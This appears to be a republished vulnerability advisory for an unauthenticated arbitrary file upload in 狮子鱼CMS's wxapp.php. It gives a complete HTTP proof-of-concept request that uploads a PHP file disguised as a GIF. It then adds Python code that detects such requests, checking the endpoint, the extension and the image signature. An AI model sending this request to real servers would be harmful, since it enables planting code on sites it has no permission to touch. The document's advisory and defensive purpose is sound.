Vulnerability description
The wxapp.php file of 狮子鱼CMS contains an arbitrary file upload vulnerability: an attacker can upload malicious files without any authentication.
Affected scope
Network mapping
Reproduction
The login page looks as follows:
Send the following request to upload a PHP file:
POST /wxapp.php?controller=Goods.doPageUpload HTTP/1.1
Host:
Content-Length: 210
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Disposition: form-data; name="upfile"; filename="test.php"
Content-Type: image/gif
phpinfo();
------WebKitFormBoundary8UaANmWAgM4BqBSs--
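As an added example (not from the original post or the CMS), the Python below parses a raw request like the one above and reports why a hardened upload handler or a WAF/IDS rule should reject it: the unauthenticated Goods.doPageUpload endpoint, an executable extension in the uploaded filename, and a declared image type whose bytes carry no image signature. The sample request is a constructed, trimmed copy of the PoC; the host name is a placeholder.

```python
import re
from urllib.parse import urlsplit, parse_qs
SAMPLE_REQUEST = (  # constructed sample modelled on the PoC request above (headers trimmed)
    b"POST /wxapp.php?controller=Goods.doPageUpload HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs\r\n"
    b"\r\n"
    b"------WebKitFormBoundary8UaANmWAgM4BqBSs\r\n"
    b'Content-Disposition: form-data; name="upfile"; filename="test.php"\r\n'
    b"Content-Type: image/gif\r\n"
    b"\r\n"
    b"phpinfo();\r\n"
    b"------WebKitFormBoundary8UaANmWAgM4BqBSs--\r\n"
)
EXEC_EXT = {"php", "php3", "php4", "php5", "phtml", "phar"}  # must never be written under the web root
MAGIC = {"image/gif": (b"GIF87a", b"GIF89a"), "image/png": (b"\x89PNG",), "image/jpeg": (b"\xff\xd8\xff",)}

def _headers(block):
    out = {}
    for line in block.decode("latin-1").split("\r\n"):  # 'Name: value' lines -> lower-cased dict
        k, _, v = line.partition(":")
        out[k.strip().lower()] = v.strip()
    return out

def parse_parts(body, boundary):
    """Minimal multipart/form-data splitter: yields (headers, data) per part."""
    for chunk in body.split(b"--" + boundary.encode())[1:-1]:  # drop preamble and closing "--" epilogue
        head, _, data = chunk.removeprefix(b"\r\n").partition(b"\r\n\r\n")
        yield _headers(head), data.removesuffix(b"\r\n")

def audit_upload(raw):
    """Return the findings that justify blocking or alerting on this request."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, _, header_block = head.partition(b"\r\n")
    method, target, _ = request_line.decode("latin-1").split(" ", 2)
    url, findings = urlsplit(target), []
    if method == "POST" and url.path.endswith("/wxapp.php") and \
            parse_qs(url.query).get("controller", [""])[0] == "Goods.doPageUpload":
        findings.append("POST to unauthenticated upload handler Goods.doPageUpload")
    m = re.search(r'boundary=("?)([^";]+)\1', _headers(header_block).get("content-type", ""))
    for pheaders, data in (parse_parts(body, m.group(2)) if m else []):
        fm = re.search(r'filename="([^"]*)"', pheaders.get("content-disposition", ""))
        name = fm.group(1) if fm else ""
        bad = [s for s in name.lower().split(".")[1:] if s in EXEC_EXT]  # also catches a.php.gif
        if bad:
            findings.append(f"executable extension .{bad[0]} in uploaded filename {name!r}")
        ctype = pheaders.get("content-type", "")
        if ctype in MAGIC and not data.startswith(MAGIC[ctype]):
            findings.append(f"part declares {ctype} but bytes lack that image signature")
    return findings
```

The same three checks (extension allowlist, magic-byte validation, and authentication on the controller) are what the upload handler itself should enforce before writing anything to disk.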
Source: http://wiki.peiqi.tech/wiki/cms/%E7%8B%AE%E5%AD%90%E9%B1%BCCMS/%E7%8B%AE%E5%AD%90%E9%B1%BCCMS%20wxapp.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
Originally published on the WeChat official account White OWL: 狮子鱼CMS wxapp.php arbitrary file upload vulnerability